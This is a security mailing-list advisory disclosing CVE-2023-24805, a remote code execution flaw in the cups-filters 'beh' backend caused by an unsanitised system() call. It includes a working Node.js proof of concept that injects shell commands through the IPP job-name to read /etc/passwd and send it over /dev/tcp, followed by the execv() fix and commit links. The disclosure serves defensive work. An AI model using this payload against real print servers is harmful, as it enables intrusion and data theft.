'[oss-security] CVE-2023-24805: RCE in cups-filters, beh CUPS backend'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE-2023-24805: RCE in cups-filters, beh CUPS backend
From:       Till Kamppeter <till.kamppeter () gmail ! com>
Date:       2023-05-17 9:30:11
Message-ID: d20c573e-81ca-800d-5bf8-c2f96b31ea82 () gmail ! com
[Download RAW message or body]

Following bug got reported to OpenPrinting's GitHub, repo cups-filters, 
as a private (security) issue report:

https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-gpxc-v2m8-fr3x

Summary

If you use "beh" to create an accessible network printer, this security 
vulnerability can cause remote code execution.

Details

cups-filters/backend/beh.c

Line 288 in 5c9498a
   retval = system(cmdline) >> 8;

     // (context: argv = beh <job-id> <user> <title> <copies> <options> 
[file])
      snprintf(cmdline, sizeof(cmdline),
      "%s/backend/%s '%s' '%s' '%s' '%s' '%s' %s",
      cups_serverbin, scheme, argv[1], argv[2], argv[3],
            ...
      (argc == 6 ? "1" : argv[4]),
      argv[5], filename);
            ...
    retval = system(cmdline) >> 8;

The system function will be called here to execute the command, and the 
user and title parameters are user-controlled and unsanitized .

PoC

      start a beh service lpadmin -p myprinter -E -v 
beh:/1/3/5/socket://printer:9100

      exploit: // https://github.com/williamkapke/ipp

var ipp = require('ipp');
var PDFDocument = require('pdfkit');
var concat = require("concat-stream");

var doc = new PDFDocument({margin:0});
doc.text("1.pdf", 0, 0);


doc.pipe(concat(function (data) {
var printer = ipp.Printer("http://127.0.0.1:6310/printers/myprinter");
var msg = {
"operation-attributes-tag": {
"requesting-user-name": "Bumblebee",
"job-name": "';env; bash -c \"/usr/bin/cat ${PWD}etc/${PWD}/passwd > 
${PWD}dev${PWD}tcp${PWD}127.0.0.1${PWD}1337\";'' #.pdf",
"document-format": "application/pdf"
},
"job-attributes-tag":{
        "media-col": {
          "media-source": "tray-2"
        }
}
, data: data
};
printer.execute("Print-Job", msg, function(err, res){
console.log(err);
console.log(res);
});
}));
doc.end();


The report got assigned CVE-2023-24805

A fix is to use execv() instead of system() and was proposed as a pull 
request attached to the bug report.

https://github.com/OpenPrinting/cups-filters-ghsa-gpxc-v2m8-fr3x/pull/1

The pull request is merged now into

https://github.com/OpenPrinting/cups-filters (branch "master")

as commit

https://github.com/OpenPrinting/cups-filters/commit/8f274035756

and the fix is also ported to the "1.x" branch of cups-filters, as commit

https://github.com/OpenPrinting/cups-filters/commit/93e60d3df35

The fix will also be included in the upcoming releases, 2.0.0 and 1.28.18.

    Till
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic